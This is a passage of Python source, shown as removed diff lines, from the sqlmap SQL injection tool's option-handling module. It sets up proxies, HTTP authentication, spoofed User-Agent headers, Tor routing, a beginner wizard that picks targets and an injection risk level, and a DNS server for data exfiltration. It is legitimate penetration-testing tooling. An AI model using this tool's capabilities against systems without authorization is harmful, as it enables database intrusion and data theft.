if conf.proxyCred: - # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection - proxyString = "%s@" % conf.proxyCred - else: - proxyString = "" - - proxyString += "%s:%d" % (hostname, port) - proxyHandler.proxies = {"http": proxyString, "https": proxyString} - - proxyHandler.__init__(proxyHandler.proxies) - - debugMsg = "creating HTTP requests opener object" - logger.debug(debugMsg) - - handlers = filter(None, [proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler]) - - if not conf.dropSetCookie: - if not conf.loadCookies: - conf.cj = cookielib.CookieJar() - else: - conf.cj = cookielib.MozillaCookieJar() - resetCookieJar(conf.cj) - - handlers.append(urllib2.HTTPCookieProcessor(conf.cj)) - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - - if conf.proxy: - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - elif conf.authType: - warnMsg += "with authentication methods" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - opener = urllib2.build_opener(*handlers) - urllib2.install_opener(opener) - -def _setSafeVisit(): - """ - Check and set the safe visit options. 
- """ - if not any ((conf.safeUrl, conf.safeReqFile)): - return - - if conf.safeReqFile: - checkFile(conf.safeReqFile) - - raw = readCachedFileContent(conf.safeReqFile) - match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')]) - - if match: - kb.safeReq.method = match.group(1) - kb.safeReq.url = match.group(2) - kb.safeReq.headers = {} - - for line in raw[raw.find('\n') + 1:].split('\n'): - line = line.strip() - if line and ':' in line: - key, value = line.split(':', 1) - value = value.strip() - kb.safeReq.headers[key] = value - if key == HTTP_HEADER.HOST: - if not value.startswith("http"): - scheme = "http" - if value.endswith(":443"): - scheme = "https" - value = "%s://%s" % (scheme, value) - kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url) - else: - break - - post = None - - if '\r\n\r\n' in raw: - post = raw[raw.find('\r\n\r\n') + 4:] - elif '\n\n' in raw: - post = raw[raw.find('\n\n') + 2:] - - if post and post.strip(): - kb.safeReq.post = post - else: - kb.safeReq.post = None - else: - errMsg = "invalid format of a safe request file" - raise SqlmapSyntaxException, errMsg - else: - if not re.search("^http[s]*://", conf.safeUrl): - if ":443/" in conf.safeUrl: - conf.safeUrl = "https://" + conf.safeUrl - else: - conf.safeUrl = "http://" + conf.safeUrl - - if conf.safeFreq <= 0: - errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features" - raise SqlmapSyntaxException(errMsg) - -def _setPrefixSuffix(): - if conf.prefix is not None and conf.suffix is not None: - # Create a custom boundary object for user's supplied prefix - # and suffix - boundary = AttribDict() - - boundary.level = 1 - boundary.clause = [0] - boundary.where = [1, 2, 3] - boundary.prefix = conf.prefix - boundary.suffix = conf.suffix - - if " like" in boundary.suffix.lower(): - if "'" in boundary.suffix.lower(): - boundary.ptype = 3 - elif '"' in boundary.suffix.lower(): - boundary.ptype = 5 - elif "'" in 
boundary.suffix: - boundary.ptype = 2 - elif '"' in boundary.suffix: - boundary.ptype = 4 - else: - boundary.ptype = 1 - - # user who provides --prefix/--suffix does not want other boundaries - # to be tested for - conf.boundaries = [boundary] - -def _setAuthCred(): - """ - Adds authentication credentials (if any) for current target to the password manager - (used by connection handler) - """ - - if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)): - kb.passwordMgr.add_password(None, "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword) - -def _setHTTPAuthentication(): - """ - Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or PKI), - username and password for first three methods, or PEM private key file for - PKI authentication - """ - - global authHandler - - if not conf.authType and not conf.authCred and not conf.authFile: - return - - if conf.authFile and not conf.authType: - conf.authType = AUTH_TYPE.PKI - - elif conf.authType and not conf.authCred and not conf.authFile: - errMsg = "you specified the HTTP authentication type, but " - errMsg += "did not provide the credentials" - raise SqlmapSyntaxException(errMsg) - - elif not conf.authType and conf.authCred: - errMsg = "you specified the HTTP authentication credentials, " - errMsg += "but did not provide the type" - raise SqlmapSyntaxException(errMsg) - - elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI): - errMsg = "HTTP authentication type value must be " - errMsg += "Basic, Digest, NTLM or PKI" - raise SqlmapSyntaxException(errMsg) - - if not conf.authFile: - debugMsg = "setting the HTTP authentication type and credentials" - logger.debug(debugMsg) - - aTypeLower = conf.authType.lower() - - if aTypeLower in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): - regExp = "^(.*?):(.*?)$" - errMsg = "HTTP %s authentication 
credentials " % aTypeLower - errMsg += "value must be in format 'username:password'" - elif aTypeLower == AUTH_TYPE.NTLM: - regExp = "^(.*\\\\.*):(.*?)$" - errMsg = "HTTP NTLM authentication credentials value must " - errMsg += "be in format 'DOMAIN\username:password'" - elif aTypeLower == AUTH_TYPE.PKI: - errMsg = "HTTP PKI authentication require " - errMsg += "usage of option `--auth-pki`" - raise SqlmapSyntaxException(errMsg) - - aCredRegExp = re.search(regExp, conf.authCred) - - if not aCredRegExp: - raise SqlmapSyntaxException(errMsg) - - conf.authUsername = aCredRegExp.group(1) - conf.authPassword = aCredRegExp.group(2) - - kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm() - - _setAuthCred() - - if aTypeLower == AUTH_TYPE.BASIC: - authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr) - - elif aTypeLower == AUTH_TYPE.DIGEST: - authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr) - - elif aTypeLower == AUTH_TYPE.NTLM: - try: - from ntlm import HTTPNtlmAuthHandler - except ImportError: - errMsg = "sqlmap requires Python NTLM third-party library " - errMsg += "in order to authenticate via NTLM, " - errMsg += "http://code.google.com/p/python-ntlm/" - raise SqlmapMissingDependence(errMsg) - - authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr) - else: - debugMsg = "setting the HTTP(s) authentication PEM private key" - logger.debug(debugMsg) - - _ = safeExpandUser(conf.authFile) - checkFile(_) - authHandler = HTTPSPKIAuthHandler(_) - -def _setHTTPExtraHeaders(): - if conf.headers: - debugMsg = "setting extra HTTP headers" - logger.debug(debugMsg) - - conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n") - - for headerValue in conf.headers: - if not headerValue.strip(): - continue - - if headerValue.count(':') >= 1: - header, value = (_.lstrip() for _ in headerValue.split(":", 1)) - - if header and value: - conf.httpHeaders.append((header, value)) - else: - errMsg = "invalid header value: 
%s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u') - raise SqlmapSyntaxException(errMsg) - - elif not conf.requestFile and len(conf.httpHeaders or []) < 2: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5")) - if not conf.charset: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7")) - else: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset)) - - # Invalidating any caching mechanism in between - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html - conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store")) - conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache")) - -def _defaultHTTPUserAgent(): - """ - @return: default sqlmap HTTP User-Agent header - @rtype: C{str} - """ - - return "%s (%s)" % (VERSION_STRING, SITE) - - # Firefox 3 running on Ubuntu 9.04 updated at April 2009 - #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9" - - # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english - # updated at March 2009 - #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" - -def _setHTTPUserAgent(): - """ - Set the HTTP User-Agent header. 
- Depending on the user options it can be: - - * The default sqlmap string - * A default value read as user option - * A random value read from a list of User-Agent headers from a - file choosed as user option - """ - - if conf.mobile: - message = "which smartphone do you want sqlmap to imitate " - message += "through HTTP User-Agent header?\n" - items = sorted(getPublicTypeMembers(MOBILES, True)) - - for count in xrange(len(items)): - item = items[count] - message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "") - - test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1) - - try: - item = items[int(test) - 1] - except: - item = MOBILES.IPHONE - - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1])) - - elif conf.agent: - debugMsg = "setting the HTTP User-Agent header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent)) - - elif not conf.randomAgent: - _ = True - - for header, _ in conf.httpHeaders: - if header == HTTP_HEADER.USER_AGENT: - _ = False - break - - if _: - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent())) - - else: - if not kb.userAgents: - debugMsg = "loading random HTTP User-Agent header(s) from " - debugMsg += "file '%s'" % paths.USER_AGENTS - logger.debug(debugMsg) - - try: - kb.userAgents = getFileItems(paths.USER_AGENTS) - except IOError: - warnMsg = "unable to read HTTP User-Agent header " - warnMsg += "file '%s'" % paths.USER_AGENTS - logger.warn(warnMsg) - - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent())) - return - - userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0] - - infoMsg = "fetched random HTTP User-Agent header from " - infoMsg += "file '%s': '%s'" % (paths.USER_AGENTS, userAgent) - logger.info(infoMsg) - - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent)) - -def _setHTTPReferer(): - """ - Set the HTTP Referer - """ - - if conf.referer: - 
debugMsg = "setting the HTTP Referer header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer)) - -def _setHTTPHost(): - """ - Set the HTTP Host - """ - - if conf.host: - debugMsg = "setting the HTTP Host header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host)) - -def _setHTTPCookies(): - """ - Set the HTTP Cookie header - """ - - if conf.cookie: - debugMsg = "setting the HTTP Cookie header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie)) - -def _setHTTPTimeout(): - """ - Set the HTTP timeout - """ - - if conf.timeout: - debugMsg = "setting the HTTP timeout" - logger.debug(debugMsg) - - conf.timeout = float(conf.timeout) - - if conf.timeout < 3.0: - warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " - warnMsg += "will going to reset it" - logger.warn(warnMsg) - - conf.timeout = 3.0 - else: - conf.timeout = 30.0 - - socket.setdefaulttimeout(conf.timeout) - -def _checkDependencies(): - """ - Checks for missing dependencies. - """ - - if conf.dependencies: - checkDependencies() - -def _createTemporaryDirectory(): - """ - Creates temporary directory for this run. - """ - - try: - if not os.path.isdir(tempfile.gettempdir()): - os.makedirs(tempfile.gettempdir()) - except IOError, ex: - errMsg = "there has been a problem while accessing " - errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) - errMsg += "make sure that there is enough disk space left. 
If problem persists, " - errMsg += "try to set environment variable 'TEMP' to a location " - errMsg += "writeable by the current user" - raise SqlmapSystemException, errMsg - - if "sqlmap" not in (tempfile.tempdir or ""): - tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) - - kb.tempDir = tempfile.tempdir - - if not os.path.isdir(tempfile.tempdir): - os.makedirs(tempfile.tempdir) - -def _cleanupOptions(): - """ - Cleanup configuration attributes. - """ - - debugMsg = "cleaning up configuration parameters" - logger.debug(debugMsg) - - width = getConsoleWidth() - - if conf.eta: - conf.progressWidth = width - 26 - else: - conf.progressWidth = width - 46 - - for key, value in conf.items(): - if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")): - conf[key] = safeExpandUser(value) - - if conf.testParameter: - conf.testParameter = urldecode(conf.testParameter) - conf.testParameter = conf.testParameter.replace(" ", "") - conf.testParameter = re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter) - else: - conf.testParameter = [] - - if conf.user: - conf.user = conf.user.replace(" ", "") - - if conf.rParam: - conf.rParam = conf.rParam.replace(" ", "") - conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam) - else: - conf.rParam = [] - - if conf.paramDel and '\\' in conf.paramDel: - conf.paramDel = conf.paramDel.decode("string_escape") - - if conf.skip: - conf.skip = conf.skip.replace(" ", "") - conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip) - else: - conf.skip = [] - - if conf.cookie: - conf.cookie = re.sub(r"[\r\n]", "", conf.cookie) - - if conf.delay: - conf.delay = float(conf.delay) - - if conf.rFile: - conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile)) - - if conf.wFile: - conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile)) - - if conf.dFile: - conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile)) - - if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"): - conf.sitemapUrl = 
"http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl) - - if conf.msfPath: - conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath)) - - if conf.tmpPath: - conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath)) - - if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.forms, conf.crawlDepth)): - conf.multipleTargets = True - - if conf.optimize: - setOptimize() - - if conf.data: - conf.data = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data, re.I) - - if conf.url: - conf.url = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url, re.I) - - if conf.os: - conf.os = conf.os.capitalize() - - if conf.dbms: - conf.dbms = conf.dbms.capitalize() - - if conf.testFilter: - conf.testFilter = conf.testFilter.strip('*+') - conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter) - - if conf.testSkip: - conf.testSkip = conf.testSkip.strip('*+') - conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip) - - if "timeSec" not in kb.explicitSettings: - if conf.tor: - conf.timeSec = 2 * conf.timeSec - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE - - warnMsg = "increasing default value for " - warnMsg += "option '--time-sec' to %d because " % conf.timeSec - warnMsg += "switch '--tor' was provided" - logger.warn(warnMsg) - else: - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE - - if conf.retries: - conf.retries = min(conf.retries, MAX_CONNECT_RETRIES) - - if conf.code: - conf.code = int(conf.code) - - if conf.csvDel: - conf.csvDel = conf.csvDel.decode("string_escape") # e.g. 
'\\t' -> '\t' - - if conf.torPort and isinstance(conf.torPort, basestring) and conf.torPort.isdigit(): - conf.torPort = int(conf.torPort) - - if conf.torType: - conf.torType = conf.torType.upper() - - if conf.outputDir: - paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir)) - setPaths() - - if conf.string: - try: - conf.string = conf.string.decode("unicode_escape") - except: - charset = string.whitespace.replace(" ", "") - for _ in charset: - conf.string = conf.string.replace(_.encode("string_escape"), _) - - if conf.getAll: - map(lambda x: conf.__setitem__(x, True), WIZARD.ALL) - - if conf.noCast: - for _ in DUMP_REPLACEMENTS.keys(): - del DUMP_REPLACEMENTS[_] - - if conf.dumpFormat: - conf.dumpFormat = conf.dumpFormat.upper() - - if conf.torType: - conf.torType = conf.torType.upper() - - if conf.col: - conf.col = re.sub(r"\s*,\s*", ",", conf.col) - - if conf.excludeCol: - conf.excludeCol = re.sub(r"\s*,\s*", ",", conf.excludeCol) - - if conf.binaryFields: - conf.binaryFields = re.sub(r"\s*,\s*", ",", conf.binaryFields) - - threadData = getCurrentThreadData() - threadData.reset() - -def _dirtyPatches(): - """ - Place for "dirty" Python related patches - """ - - httplib._MAXLINE = 1 * 1024 * 1024 # to accept overly long result lines (e.g. SQLi results in HTTP header responses) - -def _purgeOutput(): - """ - Safely removes (purges) output directory. - """ - - if conf.purgeOutput: - purge(paths.SQLMAP_OUTPUT_PATH) - -def _setConfAttributes(): - """ - This function set some needed attributes into the configuration - singleton. 
- """ - - debugMsg = "initializing the configuration" - logger.debug(debugMsg) - - conf.authUsername = None - conf.authPassword = None - conf.boundaries = [] - conf.cj = None - conf.dbmsConnector = None - conf.dbmsHandler = None - conf.dnsServer = None - conf.dumpPath = None - conf.hashDB = None - conf.hashDBFile = None - conf.httpHeaders = [] - conf.hostname = None - conf.ipv6 = False - conf.multipleTargets = False - conf.outputPath = None - conf.paramDict = {} - conf.parameters = {} - conf.path = None - conf.port = None - conf.proxyList = None - conf.resultsFilename = None - conf.resultsFP = None - conf.scheme = None - conf.tests = [] - conf.trafficFP = None - conf.wFileType = None - -def _setKnowledgeBaseAttributes(flushAll=True): - """ - This function set some needed attributes into the knowledge base - singleton. - """ - - debugMsg = "initializing the knowledge base" - logger.debug(debugMsg) - - kb.absFilePaths = set() - kb.adjustTimeDelay = None - kb.alerted = False - kb.alwaysRefresh = None - kb.arch = None - kb.authHeader = None - kb.bannerFp = AttribDict() - kb.binaryField = False - - kb.brute = AttribDict({"tables": [], "columns": []}) - kb.bruteMode = False - - kb.cache = AttribDict() - kb.cache.content = {} - kb.cache.regex = {} - kb.cache.stdev = {} - - kb.chars = AttribDict() - kb.chars.delimiter = randomStr(length=6, lowercase=True) - kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) - kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) - kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True)) - - kb.columnExistsChoice = None - kb.commonOutputs = None - kb.counters = {} - kb.data = AttribDict() - kb.dataOutputFlag = False - - # Active back-end DBMS fingerprint - 
kb.dbms = None - kb.dbmsVersion = [UNKNOWN_DBMS_VERSION] - - kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] - kb.dep = None - kb.dnsMode = False - kb.dnsTest = None - kb.docRoot = None - kb.dumpTable = None - kb.dynamicMarkings = [] - kb.dynamicParameter = False - kb.endDetection = False - kb.explicitSettings = set() - kb.extendTests = None - kb.errorChunkLength = None - kb.errorIsNone = True - kb.fileReadMode = False - kb.followSitemapRecursion = None - kb.forcedDbms = None - kb.forcePartialUnion = False - kb.forceWhere = None - kb.futileUnion = None - kb.headersFp = {} - kb.heuristicDbms = None - kb.heuristicMode = False - kb.heuristicTest = None - kb.hintValue = None - kb.htmlFp = [] - kb.httpErrorCodes = {} - kb.inferenceMode = False - kb.ignoreCasted = None - kb.ignoreNotFound = False - kb.ignoreTimeout = False - kb.injection = InjectionDict() - kb.injections = [] - kb.laggingChecked = False - kb.lastParserStatus = None - - kb.locks = AttribDict() - for _ in ("cache", "count", "index", "io", "limit", "log", "socket", "redirect", "request", "value"): - kb.locks[_] = threading.Lock() - - kb.matchRatio = None - kb.maxConnectionsFlag = False - kb.mergeCookies = None - kb.multiThreadMode = False - kb.negativeLogic = False - kb.nullConnection = None - kb.oldMsf = None - kb.orderByColumns = None - kb.originalCode = None - kb.originalPage = None - kb.originalPageTime = None - kb.originalTimeDelay = None - kb.originalUrls = dict() - - # Back-end DBMS underlying operating system fingerprint via banner (-b) - # parsing - kb.os = None - kb.osVersion = None - kb.osSP = None - - kb.pageCompress = True - kb.pageTemplate = None - kb.pageTemplates = dict() - kb.pageEncoding = DEFAULT_PAGE_ENCODING - kb.pageStable = None - kb.partRun = None - kb.permissionFlag = False - kb.postHint = None - kb.postSpaceToPlus = False - kb.postUrlEncode = True - kb.prependFlag = False - kb.processResponseCounter = 0 - kb.previousMethod = None - kb.processUserMarks = None - kb.proxyAuthHeader = 
None - kb.queryCounter = 0 - kb.redirectChoice = None - kb.reflectiveMechanism = True - kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0} - kb.requestCounter = 0 - kb.resendPostOnRedirect = None - kb.responseTimes = {} - kb.responseTimeMode = None - kb.responseTimePayload = None - kb.resumeValues = True - kb.safeCharEncode = False - kb.safeReq = AttribDict() - kb.singleLogFlags = set() - kb.reduceTests = None - kb.tlsSNI = {} - kb.stickyDBMS = False - kb.stickyLevel = None - kb.storeCrawlingChoice = None - kb.storeHashesChoice = None - kb.suppressResumeInfo = False - kb.technique = None - kb.tempDir = None - kb.testMode = False - kb.testOnlyCustom = False - kb.testQueryCount = 0 - kb.testType = None - kb.threadContinue = True - kb.threadException = False - kb.tableExistsChoice = None - kb.timeValidCharsRun = 0 - kb.uChar = NULL - kb.unionDuplicates = False - kb.xpCmdshellAvailable = False - - if flushAll: - kb.headerPaths = {} - kb.keywords = set(getFileItems(paths.SQL_KEYWORDS)) - kb.passwordMgr = None - kb.skipVulnHost = None - kb.tamperFunctions = [] - kb.targets = oset() - kb.testedParams = set() - kb.userAgents = None - kb.vainRun = True - kb.vulnHosts = set() - kb.wafFunctions = [] - kb.wordlists = None - -def _useWizardInterface(): - """ - Presents simple wizard interface for beginner users - """ - - if not conf.wizard: - return - - logger.info("starting wizard interface") - - while not conf.url: - message = "Please enter full target URL (-u): " - conf.url = readInput(message, default=None) - - message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST) - conf.data = readInput(message, default=None) - - if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url): - warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST) - warnMsg += 
"(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). " - if not conf.crawlDepth and not conf.forms: - warnMsg += "Will search for forms" - conf.forms = True - logger.warn(warnMsg) - - choice = None - - while choice is None or choice not in ("", "1", "2", "3"): - message = "Injection difficulty (--level/--risk). Please choose:\n" - message += "[1] Normal (default)\n[2] Medium\n[3] Hard" - choice = readInput(message, default='1') - - if choice == '2': - conf.risk = 2 - conf.level = 3 - elif choice == '3': - conf.risk = 3 - conf.level = 5 - else: - conf.risk = 1 - conf.level = 1 - - if not conf.getAll: - choice = None - - while choice is None or choice not in ("", "1", "2", "3"): - message = "Enumeration (--banner/--current-user/etc). Please choose:\n" - message += "[1] Basic (default)\n[2] Intermediate\n[3] All" - choice = readInput(message, default='1') - - if choice == '2': - map(lambda x: conf.__setitem__(x, True), WIZARD.INTERMEDIATE) - elif choice == '3': - map(lambda x: conf.__setitem__(x, True), WIZARD.ALL) - else: - map(lambda x: conf.__setitem__(x, True), WIZARD.BASIC) - - logger.debug("muting sqlmap.. it will do the magic for you") - conf.verbose = 0 - - conf.batch = True - conf.threads = 4 - - dataToStdout("\nsqlmap is running, please wait..\n\n") - -def _saveConfig(): - """ - Saves the command line options to a sqlmap configuration INI file - Format. 
- """ - - if not conf.saveConfig: - return - - debugMsg = "saving command line options to a sqlmap configuration INI file" - logger.debug(debugMsg) - - config = UnicodeRawConfigParser() - userOpts = {} - - for family in optDict.keys(): - userOpts[family] = [] - - for option, value in conf.items(): - for family, optionData in optDict.items(): - if option in optionData: - userOpts[family].append((option, value, optionData[option])) - - for family, optionData in userOpts.items(): - config.add_section(family) - - optionData.sort() - - for option, value, datatype in optionData: - if datatype and isListLike(datatype): - datatype = datatype[0] - - if option in IGNORE_SAVE_OPTIONS: - continue - - if value is None: - if datatype == OPTION_TYPE.BOOLEAN: - value = "False" - elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): - if option in defaults: - value = str(defaults[option]) - else: - value = "0" - elif datatype == OPTION_TYPE.STRING: - value = "" - - if isinstance(value, basestring): - value = value.replace("\n", "\n ") - - config.set(family, option, value) - - confFP = openFile(conf.saveConfig, "wb") - - try: - config.write(confFP) - except IOError, ex: - errMsg = "something went wrong while trying " - errMsg += "to write to the configuration file '%s' ('%s')" % (conf.saveConfig, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig - logger.info(infoMsg) - -def setVerbosity(): - """ - This function set the verbosity of sqlmap output messages. 
- """ - - if conf.verbose is None: - conf.verbose = 1 - - conf.verbose = int(conf.verbose) - - if conf.verbose == 0: - logger.setLevel(logging.ERROR) - elif conf.verbose == 1: - logger.setLevel(logging.INFO) - elif conf.verbose > 2 and conf.eta: - conf.verbose = 2 - logger.setLevel(logging.DEBUG) - elif conf.verbose == 2: - logger.setLevel(logging.DEBUG) - elif conf.verbose == 3: - logger.setLevel(CUSTOM_LOGGING.PAYLOAD) - elif conf.verbose == 4: - logger.setLevel(CUSTOM_LOGGING.TRAFFIC_OUT) - elif conf.verbose >= 5: - logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN) - -def _normalizeOptions(inputOptions): - """ - Sets proper option types - """ - - types_ = {} - for group in optDict.keys(): - types_.update(optDict[group]) - - for key in inputOptions: - if key in types_: - value = inputOptions[key] - if value is None: - continue - - type_ = types_[key] - if type_ and isinstance(type_, tuple): - type_ = type_[0] - - if type_ == OPTION_TYPE.BOOLEAN: - try: - value = bool(value) - except (TypeError, ValueError): - value = False - elif type_ == OPTION_TYPE.INTEGER: - try: - value = int(value) - except (TypeError, ValueError): - value = 0 - elif type_ == OPTION_TYPE.FLOAT: - try: - value = float(value) - except (TypeError, ValueError): - value = 0.0 - - inputOptions[key] = value - -def _mergeOptions(inputOptions, overrideOptions): - """ - Merge command line options with configuration file and default options. - - @param inputOptions: optparse object with command line options. 
- @type inputOptions: C{instance} - """ - - if inputOptions.pickledOptions: - try: - inputOptions = base64unpickle(inputOptions.pickledOptions) - _normalizeOptions(inputOptions) - except Exception, ex: - errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions - errMsg += " ('%s')" % ex if ex.message else "" - raise SqlmapSyntaxException(errMsg) - - if inputOptions.configFile: - configFileParser(inputOptions.configFile) - - if hasattr(inputOptions, "items"): - inputOptionsItems = inputOptions.items() - else: - inputOptionsItems = inputOptions.__dict__.items() - - for key, value in inputOptionsItems: - if key not in conf or value not in (None, False) or overrideOptions: - conf[key] = value - - for key, value in conf.items(): - if value is not None: - kb.explicitSettings.add(key) - - for key, value in defaults.items(): - if hasattr(conf, key) and conf[key] is None: - conf[key] = value - - lut = {} - for group in optDict.keys(): - lut.update((_.upper(), _) for _ in optDict[group]) - - envOptions = {} - for key, value in os.environ.items(): - if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX): - _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper() - if _ in lut: - envOptions[lut[_]] = value - - if envOptions: - _normalizeOptions(envOptions) - for key, value in envOptions.items(): - conf[key] = value - - mergedOptions.update(conf) - -def _setTrafficOutputFP(): - if conf.trafficFile: - infoMsg = "setting file for logging HTTP traffic" - logger.info(infoMsg) - - conf.trafficFP = openFile(conf.trafficFile, "w+") - -def _setDNSServer(): - if not conf.dnsName: - return - - infoMsg = "setting up DNS server instance" - logger.info(infoMsg) - - isAdmin = runningAsAdmin() - - if isAdmin: - try: - conf.dnsServer = DNSServer() - conf.dnsServer.run() - except socket.error, msg: - errMsg = "there was an error while setting up " - errMsg += "DNS server instance ('%s')" % msg - raise SqlmapGenericException(errMsg) - else: - errMsg = "you need 
to run sqlmap as an administrator " - errMsg += "if you want to perform a DNS data exfiltration attack " - errMsg += "as it will need to listen on privileged UDP port 53 " - errMsg += "for incoming address resolution attempts" - raise SqlmapMissingPrivileges(errMsg) - -def _setProxyList(): - if not conf.proxyFile: - return - - conf.proxyList = [] - for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w.]+):(\d+)", readCachedFileContent(conf.proxyFile)): - _, type_, address, port = match.groups() - conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port)) - -def _setTorProxySettings(): - if not conf.tor: - return - - if conf.torType == PROXY_TYPE.HTTP: - _setTorHttpProxySettings() - else: - _setTorSocksProxySettings() - -def _setTorHttpProxySettings(): - infoMsg = "setting Tor HTTP proxy settings" - logger.info(infoMsg) - - found = None - - for port in (DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((LOCALHOST, port)) - found = port - break - except socket.error: - pass - - s.close() - - if found: - conf.proxy = "http://%s:%d" % (LOCALHOST, found) - else: - errMsg = "can't establish connection with the Tor proxy. " - errMsg += "Please make sure that you have Vidalia, Privoxy or " - errMsg += "Polipo bundle installed for you to be able to " - errMsg += 